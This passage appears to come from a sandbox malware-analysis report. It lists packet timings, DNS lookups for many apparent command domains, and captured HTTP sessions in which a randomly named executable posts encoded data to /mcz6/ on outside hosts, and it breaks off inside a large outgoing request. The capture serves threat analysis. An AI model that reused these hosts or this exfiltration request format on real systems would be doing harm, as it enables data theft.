Jun 5, 2024 15:09:14.038985014 CEST	80	49790	162.241.216.140	192.168.2.4
Jun 5, 2024 15:09:14.704629898 CEST	80	49790	162.241.216.140	192.168.2.4
Jun 5, 2024 15:09:14.736917019 CEST	80	49790	162.241.216.140	192.168.2.4
Jun 5, 2024 15:09:14.736984968 CEST	49790	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:09:15.537123919 CEST	49790	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:09:16.556476116 CEST	49791	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:09:16.561743975 CEST	80	49791	162.241.216.140	192.168.2.4
Jun 5, 2024 15:09:16.561827898 CEST	49791	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:09:16.564799070 CEST	49791	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:09:16.569884062 CEST	80	49791	162.241.216.140	192.168.2.4
Jun 5, 2024 15:09:16.569916010 CEST	80	49791	162.241.216.140	192.168.2.4
Jun 5, 2024 15:09:16.569951057 CEST	80	49791	162.241.216.140	192.168.2.4
Jun 5, 2024 15:09:16.570029974 CEST	80	49791	162.241.216.140	192.168.2.4
Jun 5, 2024 15:09:16.570256948 CEST	80	49791	162.241.216.140	192.168.2.4
Jun 5, 2024 15:09:16.570348024 CEST	80	49791	162.241.216.140	192.168.2.4
Jun 5, 2024 15:09:16.570488930 CEST	80	49791	162.241.216.140	192.168.2.4
Jun 5, 2024 15:09:16.570518970 CEST	80	49791	162.241.216.140	192.168.2.4
Jun 5, 2024 15:09:16.570552111 CEST	80	49791	162.241.216.140	192.168.2.4
Jun 5, 2024 15:09:17.216607094 CEST	80	49791	162.241.216.140	192.168.2.4
Jun 5, 2024 15:09:17.249207973 CEST	80	49791	162.241.216.140	192.168.2.4
Jun 5, 2024 15:09:17.249296904 CEST	49791	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:09:18.068459034 CEST	49791	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:09:19.087178946 CEST	49792	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:09:19.092282057 CEST	80	49792	162.241.216.140	192.168.2.4
Jun 5, 2024 15:09:19.093616962 CEST	49792	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:09:19.097532034 CEST	49792	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:09:19.102598906 CEST	80	49792	162.241.216.140	192.168.2.4
Jun 5, 2024 15:09:19.758676052 CEST	80	49792	162.241.216.140	192.168.2.4
Jun 5, 2024 15:09:19.791189909 CEST	80	49792	162.241.216.140	192.168.2.4
Jun 5, 2024 15:09:19.791297913 CEST	49792	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:09:19.791995049 CEST	49792	80	192.168.2.4	162.241.216.140
Jun 5, 2024 15:09:19.796940088 CEST	80	49792	162.241.216.140	192.168.2.4
Jun 5, 2024 15:09:24.806230068 CEST	49793	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:09:24.811275005 CEST	80	49793	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:24.811361074 CEST	49793	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:09:24.813693047 CEST	49793	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:09:24.818687916 CEST	80	49793	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:25.644465923 CEST	80	49793	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:25.644511938 CEST	80	49793	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:25.644531012 CEST	80	49793	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:25.644726992 CEST	49793	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:09:25.764163971 CEST	80	49793	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:25.764234066 CEST	49793	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:09:26.318439007 CEST	49793	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:09:27.336396933 CEST	49794	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:09:27.341490984 CEST	80	49794	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:27.341581106 CEST	49794	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:09:27.343163967 CEST	49794	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:09:27.348175049 CEST	80	49794	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:28.172183037 CEST	80	49794	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:28.172216892 CEST	80	49794	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:28.172316074 CEST	49794	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:09:28.291389942 CEST	80	49794	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:28.293620110 CEST	49794	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:09:28.849669933 CEST	49794	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:09:29.867526054 CEST	49795	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:09:29.946408033 CEST	80	49795	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:29.947408915 CEST	49795	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:09:29.949623108 CEST	49795	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:09:29.955935001 CEST	80	49795	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:29.955950975 CEST	80	49795	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:29.955975056 CEST	80	49795	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:29.955988884 CEST	80	49795	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:29.955993891 CEST	80	49795	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:29.956175089 CEST	80	49795	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:29.956603050 CEST	80	49795	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:29.956631899 CEST	80	49795	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:29.956660032 CEST	80	49795	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:30.778362989 CEST	80	49795	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:30.778405905 CEST	80	49795	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:30.778443098 CEST	49795	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:09:30.896987915 CEST	80	49795	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:30.897032022 CEST	49795	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:09:31.459157944 CEST	49795	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:09:32.478524923 CEST	49796	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:09:32.483540058 CEST	80	49796	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:32.483702898 CEST	49796	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:09:32.485605001 CEST	49796	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:09:32.490617990 CEST	80	49796	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:33.311494112 CEST	80	49796	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:33.311534882 CEST	80	49796	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:33.311573029 CEST	80	49796	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:33.311609030 CEST	80	49796	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:33.311640024 CEST	80	49796	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:33.311676979 CEST	80	49796	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:33.311811924 CEST	49796	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:09:33.311811924 CEST	49796	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:09:33.311811924 CEST	49796	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:09:34.463387966 CEST	80	49796	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:34.463577986 CEST	80	49796	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:34.463582039 CEST	49796	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:09:34.463671923 CEST	49796	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:09:34.463881016 CEST	80	49796	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:34.463969946 CEST	49796	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:09:34.464158058 CEST	80	49796	217.160.0.111	192.168.2.4
Jun 5, 2024 15:09:34.464248896 CEST	49796	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:09:34.464248896 CEST	49796	80	192.168.2.4	217.160.0.111
Jun 5, 2024 15:09:34.469257116 CEST	80	49796	217.160.0.111	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 5, 2024 15:05:30.203257084 CEST	61902	53	192.168.2.4	1.1.1.1
Jun 5, 2024 15:05:30.235614061 CEST	53	61902	1.1.1.1	192.168.2.4
Jun 5, 2024 15:05:35.249650955 CEST	61767	53	192.168.2.4	1.1.1.1
Jun 5, 2024 15:05:35.295048952 CEST	53	61767	1.1.1.1	192.168.2.4
Jun 5, 2024 15:05:51.054476023 CEST	63752	53	192.168.2.4	1.1.1.1
Jun 5, 2024 15:05:51.195960045 CEST	53	63752	1.1.1.1	192.168.2.4
Jun 5, 2024 15:06:18.883794069 CEST	65371	53	192.168.2.4	1.1.1.1
Jun 5, 2024 15:06:19.075841904 CEST	53	65371	1.1.1.1	192.168.2.4
Jun 5, 2024 15:06:32.867116928 CEST	62563	53	192.168.2.4	1.1.1.1
Jun 5, 2024 15:06:33.220628977 CEST	53	62563	1.1.1.1	192.168.2.4
Jun 5, 2024 15:06:46.806027889 CEST	54751	53	192.168.2.4	1.1.1.1
Jun 5, 2024 15:06:47.104310989 CEST	53	54751	1.1.1.1	192.168.2.4
Jun 5, 2024 15:07:00.634108067 CEST	53055	53	192.168.2.4	1.1.1.1
Jun 5, 2024 15:07:01.062463045 CEST	53	53055	1.1.1.1	192.168.2.4
Jun 5, 2024 15:07:09.119416952 CEST	55133	53	192.168.2.4	1.1.1.1
Jun 5, 2024 15:07:09.512959957 CEST	53	55133	1.1.1.1	192.168.2.4
Jun 5, 2024 15:07:22.961589098 CEST	62301	53	192.168.2.4	1.1.1.1
Jun 5, 2024 15:07:22.974935055 CEST	53	62301	1.1.1.1	192.168.2.4
Jun 5, 2024 15:07:31.039388895 CEST	63504	53	192.168.2.4	1.1.1.1
Jun 5, 2024 15:07:31.243400097 CEST	53	63504	1.1.1.1	192.168.2.4
Jun 5, 2024 15:07:44.665076971 CEST	60947	53	192.168.2.4	1.1.1.1
Jun 5, 2024 15:07:44.724853992 CEST	53	60947	1.1.1.1	192.168.2.4
Jun 5, 2024 15:07:58.305305958 CEST	63333	53	192.168.2.4	1.1.1.1
Jun 5, 2024 15:07:58.317491055 CEST	53	63333	1.1.1.1	192.168.2.4
Jun 5, 2024 15:08:06.384073973 CEST	56871	53	192.168.2.4	1.1.1.1
Jun 5, 2024 15:08:06.589848995 CEST	53	56871	1.1.1.1	192.168.2.4
Jun 5, 2024 15:08:19.867969990 CEST	54678	53	192.168.2.4	1.1.1.1
Jun 5, 2024 15:08:19.901762962 CEST	53	54678	1.1.1.1	192.168.2.4
Jun 5, 2024 15:08:27.964144945 CEST	59801	53	192.168.2.4	1.1.1.1
Jun 5, 2024 15:08:27.981816053 CEST	53	59801	1.1.1.1	192.168.2.4
Jun 5, 2024 15:08:39.085716963 CEST	53456	53	192.168.2.4	1.1.1.1
Jun 5, 2024 15:08:39.448622942 CEST	53	53456	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jun 5, 2024 15:05:30.203257084 CEST	192.168.2.4	1.1.1.1	0x1011	Standard query (0)	www.dty377.com	A (IP address)	IN (0x0001)	false
Jun 5, 2024 15:05:35.249650955 CEST	192.168.2.4	1.1.1.1	0x918d	Standard query (0)	www.lenslaser.com	A (IP address)	IN (0x0001)	false
Jun 5, 2024 15:05:51.054476023 CEST	192.168.2.4	1.1.1.1	0x5e68	Standard query (0)	www.allinone24.shop	A (IP address)	IN (0x0001)	false
Jun 5, 2024 15:06:18.883794069 CEST	192.168.2.4	1.1.1.1	0xc6d8	Standard query (0)	www.carliente.com	A (IP address)	IN (0x0001)	false
Jun 5, 2024 15:06:32.867116928 CEST	192.168.2.4	1.1.1.1	0x1079	Standard query (0)	www.walletweb367.top	A (IP address)	IN (0x0001)	false
Jun 5, 2024 15:06:46.806027889 CEST	192.168.2.4	1.1.1.1	0x43ca	Standard query (0)	www.deaybrid.info	A (IP address)	IN (0x0001)	false
Jun 5, 2024 15:07:00.634108067 CEST	192.168.2.4	1.1.1.1	0x341b	Standard query (0)	www.prizesupermarket.com	A (IP address)	IN (0x0001)	false
Jun 5, 2024 15:07:09.119416952 CEST	192.168.2.4	1.1.1.1	0xa7b5	Standard query (0)	www.jrksa.info	A (IP address)	IN (0x0001)	false
Jun 5, 2024 15:07:22.961589098 CEST	192.168.2.4	1.1.1.1	0x84fa	Standard query (0)	www.cookedatthebottom.com	A (IP address)	IN (0x0001)	false
Jun 5, 2024 15:07:31.039388895 CEST	192.168.2.4	1.1.1.1	0x3e60	Standard query (0)	www.celebration24.co.uk	A (IP address)	IN (0x0001)	false
Jun 5, 2024 15:07:44.665076971 CEST	192.168.2.4	1.1.1.1	0xb7d8	Standard query (0)	www.gledingakademiet.no	A (IP address)	IN (0x0001)	false
Jun 5, 2024 15:07:58.305305958 CEST	192.168.2.4	1.1.1.1	0xc8b8	Standard query (0)	www.alfaspa.net	A (IP address)	IN (0x0001)	false
Jun 5, 2024 15:08:06.384073973 CEST	192.168.2.4	1.1.1.1	0x9723	Standard query (0)	www.zwervertjes.be	A (IP address)	IN (0x0001)	false
Jun 5, 2024 15:08:19.867969990 CEST	192.168.2.4	1.1.1.1	0xaa38	Standard query (0)	www.maerealtysg.com	A (IP address)	IN (0x0001)	false
Jun 5, 2024 15:08:27.964144945 CEST	192.168.2.4	1.1.1.1	0x1d45	Standard query (0)	www.polhi.lol	A (IP address)	IN (0x0001)	false
Jun 5, 2024 15:08:39.085716963 CEST	192.168.2.4	1.1.1.1	0xd527	Standard query (0)	www.dty377.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jun 5, 2024 15:05:30.235614061 CEST	1.1.1.1	192.168.2.4	0x1011	Name error (3)	www.dty377.com	none	none	A (IP address)	IN (0x0001)	false
Jun 5, 2024 15:05:35.295048952 CEST	1.1.1.1	192.168.2.4	0x918d	No error (0)	www.lenslaser.com	lenslaser.com		CNAME (Canonical name)	IN (0x0001)	false
Jun 5, 2024 15:05:35.295048952 CEST	1.1.1.1	192.168.2.4	0x918d	No error (0)	lenslaser.com		162.241.216.140	A (IP address)	IN (0x0001)	false
Jun 5, 2024 15:05:51.195960045 CEST	1.1.1.1	192.168.2.4	0x5e68	No error (0)	www.allinone24.shop	allinonestore-567794-react-native.b567794.prod.eastus.az.svc.builder.ai		CNAME (Canonical name)	IN (0x0001)	false
Jun 5, 2024 15:05:51.195960045 CEST	1.1.1.1	192.168.2.4	0x5e68	No error (0)	allinonestore-567794-react-native.b567794.prod.eastus.az.svc.builder.ai		57.151.38.169	A (IP address)	IN (0x0001)	false
Jun 5, 2024 15:06:19.075841904 CEST	1.1.1.1	192.168.2.4	0xc6d8	No error (0)	www.carliente.com	carliente.com		CNAME (Canonical name)	IN (0x0001)	false
Jun 5, 2024 15:06:19.075841904 CEST	1.1.1.1	192.168.2.4	0xc6d8	No error (0)	carliente.com		217.160.0.111	A (IP address)	IN (0x0001)	false
Jun 5, 2024 15:06:33.220628977 CEST	1.1.1.1	192.168.2.4	0x1079	No error (0)	www.walletweb367.top		91.195.240.123	A (IP address)	IN (0x0001)	false
Jun 5, 2024 15:06:47.104310989 CEST	1.1.1.1	192.168.2.4	0x43ca	No error (0)	www.deaybrid.info		162.0.237.22	A (IP address)	IN (0x0001)	false
Jun 5, 2024 15:07:01.062463045 CEST	1.1.1.1	192.168.2.4	0x341b	Name error (3)	www.prizesupermarket.com	none	none	A (IP address)	IN (0x0001)	false
Jun 5, 2024 15:07:09.512959957 CEST	1.1.1.1	192.168.2.4	0xa7b5	No error (0)	www.jrksa.info	zhs.zohosites.com		CNAME (Canonical name)	IN (0x0001)	false
Jun 5, 2024 15:07:09.512959957 CEST	1.1.1.1	192.168.2.4	0xa7b5	No error (0)	zhs.zohosites.com		136.143.186.12	A (IP address)	IN (0x0001)	false
Jun 5, 2024 15:07:22.974935055 CEST	1.1.1.1	192.168.2.4	0x84fa	Name error (3)	www.cookedatthebottom.com	none	none	A (IP address)	IN (0x0001)	false
Jun 5, 2024 15:07:31.243400097 CEST	1.1.1.1	192.168.2.4	0x3e60	No error (0)	www.celebration24.co.uk		103.168.172.37	A (IP address)	IN (0x0001)	false
Jun 5, 2024 15:07:31.243400097 CEST	1.1.1.1	192.168.2.4	0x3e60	No error (0)	www.celebration24.co.uk		103.168.172.52	A (IP address)	IN (0x0001)	false
Jun 5, 2024 15:07:44.724853992 CEST	1.1.1.1	192.168.2.4	0xb7d8	No error (0)	www.gledingakademiet.no		104.37.39.71	A (IP address)	IN (0x0001)	false
Jun 5, 2024 15:07:58.317491055 CEST	1.1.1.1	192.168.2.4	0xc8b8	Name error (3)	www.alfaspa.net	none	none	A (IP address)	IN (0x0001)	false
Jun 5, 2024 15:08:06.589848995 CEST	1.1.1.1	192.168.2.4	0x9723	No error (0)	www.zwervertjes.be		199.59.243.225	A (IP address)	IN (0x0001)	false
Jun 5, 2024 15:08:19.901762962 CEST	1.1.1.1	192.168.2.4	0xaa38	Name error (3)	www.maerealtysg.com	none	none	A (IP address)	IN (0x0001)	false
Jun 5, 2024 15:08:27.981816053 CEST	1.1.1.1	192.168.2.4	0x1d45	Name error (3)	www.polhi.lol	none	none	A (IP address)	IN (0x0001)	false
Jun 5, 2024 15:08:39.448622942 CEST	1.1.1.1	192.168.2.4	0xd527	Name error (3)	www.dty377.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.lenslaser.com

www.allinone24.shop

www.carliente.com

www.walletweb367.top

www.deaybrid.info

www.jrksa.info

www.celebration24.co.uk

www.gledingakademiet.no

www.zwervertjes.be

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49743	162.241.216.140	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:05:35.307158947 CEST	479	OUT	GET /mcz6/?abN=jpQBXhuFRU/tY42AZC12Q1/B5+IE3XzQLSvL4WMkje8Ac0YXf6PnpjUwWfsjtXOk/4EuhOubIcIRVaFREiblre7wMQ7hpfbmYAEsuIkYCegYwn6boLYQuO8=&HV8hD=_ZnHYJfHNd6deTQP HTTP/1.1 Host: www.lenslaser.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Jun 5, 2024 15:05:35.970736980 CEST	479	IN	HTTP/1.1 404 Not Found Date: Wed, 05 Jun 2024 13:05:35 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49744	57.151.38.169	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:05:51.205286026 CEST	745	OUT	POST /mcz6/ HTTP/1.1 Host: www.allinone24.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.allinone24.shop Referer: http://www.allinone24.shop/mcz6/ Connection: close Content-Length: 200 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 76 58 63 5a 46 74 50 68 45 4b 57 4a 53 37 6f 45 71 4a 4c 49 38 54 31 71 51 55 44 50 32 77 37 48 50 36 5a 65 66 69 69 64 77 4c 69 46 6d 75 74 50 73 6b 37 7a 6a 70 2f 42 66 36 39 57 79 63 35 71 2b 4d 6c 37 6d 32 57 48 47 65 39 70 43 52 59 61 4d 2f 6c 72 4e 39 72 74 4f 38 47 56 49 35 4e 69 64 5a 43 5a 4e 41 4a 58 55 31 2b 37 66 65 77 43 5a 6b 72 49 50 4f 43 5a 44 78 33 51 44 62 41 54 6d 66 31 54 50 6f 34 2f 77 69 63 46 7a 48 69 7a 69 69 64 31 4d 65 30 54 51 4e 69 73 54 56 53 58 42 68 72 63 48 62 67 77 66 32 6c 4a 52 31 72 42 47 47 52 7a 31 4e 52 30 55 79 69 5a 66 64 4d 67 66 67 3d 3d Data Ascii: abN=vXcZFtPhEKWJS7oEqJLI8T1qQUDP2w7HP6ZefiidwLiFmutPsk7zjp/Bf69Wyc5q+Ml7m2WHGe9pCRYaM/lrN9rtO8GVI5NidZCZNAJXU1+7fewCZkrIPOCZDx3QDbATmf1TPo4/wicFzHiziid1Me0TQNisTVSXBhrcHbgwf2lJR1rBGGRz1NR0UyiZfdMgfg==
Jun 5, 2024 15:05:51.874448061 CEST	345	IN	HTTP/1.1 308 Permanent Redirect Date: Wed, 05 Jun 2024 13:05:51 GMT Content-Type: text/html Content-Length: 164 Connection: close Location: https://www.allinone24.shop/mcz6 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>308 Permanent Redirect</title></head><body><center><h1>308 Permanent Redirect</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49745	57.151.38.169	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:05:53.733365059 CEST	765	OUT	POST /mcz6/ HTTP/1.1 Host: www.allinone24.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.allinone24.shop Referer: http://www.allinone24.shop/mcz6/ Connection: close Content-Length: 220 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 76 58 63 5a 46 74 50 68 45 4b 57 4a 52 62 59 45 6f 6f 4c 49 39 7a 31 70 4d 6b 44 50 34 51 37 44 50 36 56 65 66 6a 6d 4e 7a 35 57 46 6e 50 64 50 74 67 58 7a 67 70 2f 42 47 4b 39 4b 32 63 35 68 2b 4d 70 46 6d 7a 57 48 47 65 70 70 43 54 41 61 4d 4e 4e 6b 4c 74 72 76 44 63 47 4c 46 5a 4e 69 64 5a 43 5a 4e 41 63 41 55 30 61 37 63 75 41 43 5a 41 33 4c 46 75 43 47 54 68 33 51 4a 37 41 74 6d 66 30 32 50 71 4e 69 77 67 55 46 7a 47 53 7a 6a 33 68 32 48 65 30 52 65 74 6a 5a 43 30 44 61 42 77 57 54 47 49 6b 75 53 30 70 2b 51 7a 36 62 58 33 77 6b 6e 4e 31 48 4a 31 72 74 53 65 78 70 45 70 79 4b 36 78 55 66 52 34 58 2b 4f 61 72 59 6d 4f 38 77 70 69 73 3d Data Ascii: abN=vXcZFtPhEKWJRbYEooLI9z1pMkDP4Q7DP6VefjmNz5WFnPdPtgXzgp/BGK9K2c5h+MpFmzWHGeppCTAaMNNkLtrvDcGLFZNidZCZNAcAU0a7cuACZA3LFuCGTh3QJ7Atmf02PqNiwgUFzGSzj3h2He0RetjZC0DaBwWTGIkuS0p+Qz6bX3wknN1HJ1rtSexpEpyK6xUfR4X+OarYmO8wpis=
Jun 5, 2024 15:05:54.407433033 CEST	345	IN	HTTP/1.1 308 Permanent Redirect Date: Wed, 05 Jun 2024 13:05:54 GMT Content-Type: text/html Content-Length: 164 Connection: close Location: https://www.allinone24.shop/mcz6 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>308 Permanent Redirect</title></head><body><center><h1>308 Permanent Redirect</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49747	57.151.38.169	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:05:56.265642881 CEST	10847	OUT	POST /mcz6/ HTTP/1.1 Host: www.allinone24.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.allinone24.shop Referer: http://www.allinone24.shop/mcz6/ Connection: close Content-Length: 10300 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 76 58 63 5a 46 74 50 68 45 4b 57 4a 52 62 59 45 6f 6f 4c 49 39 7a 31 70 4d 6b 44 50 34 51 37 44 50 36 56 65 66 6a 6d 4e 7a 35 4f 46 6d 39 